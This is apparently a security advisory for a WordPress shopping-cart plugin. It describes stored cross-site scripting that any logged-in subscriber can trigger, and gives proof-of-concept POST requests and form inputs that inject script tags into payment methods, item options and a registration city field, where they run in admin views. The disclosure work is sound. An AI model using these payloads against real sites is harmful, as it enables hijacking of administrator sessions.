The plugin does not sanitize and escape some parameters, which could allow any authenticated users, such as subscriber to perform Stored Cross-Site Scripting (XSS) attacks.
Proof of Concept
Add new payment method with XSS exploit:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
action=payment_ajax&newname=XSS+Payment&newexplanation=<script>alert("XSS")</script>&newsettlement=acting&newmodule=payment_module
The alert script displayed on the 3. Shipping and Payment tab on the shopping cart page.
Cart URL: http://localhost/usces-cart/
Add item option with XSS exploit:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
action=item_option_ajax&ID=100&update=1&optname=radio_button&optvalue=%3Cscript%3Ealert(%22XSS%22)%3C%2Fscript%3E&optmeans=1&optessential=1&sort=0&optmetaid=1
If we want to add it as a common option, the ID will be the Cart page id (#100 cart page id). This post id is public data.
Then, if the admin selects the option from the list in the “options for items” metabox when editing the product, the script will run.
User registration with XSS exploit:
Add a product to the cart, then go to the cart: http://localhost/usces-cart/
Enter the following code for the city:
"><script>alert(1)</script>
The edit fields are escaped on the admin (for example on user edit page, or order edit page), so the alert script is not displayed. However, if the admin makes changes to the user, the script is added to the log, and the output from the log no longer the escaped, so the alert script runs.
In this case, an admin reaction to the XSS exploit is required.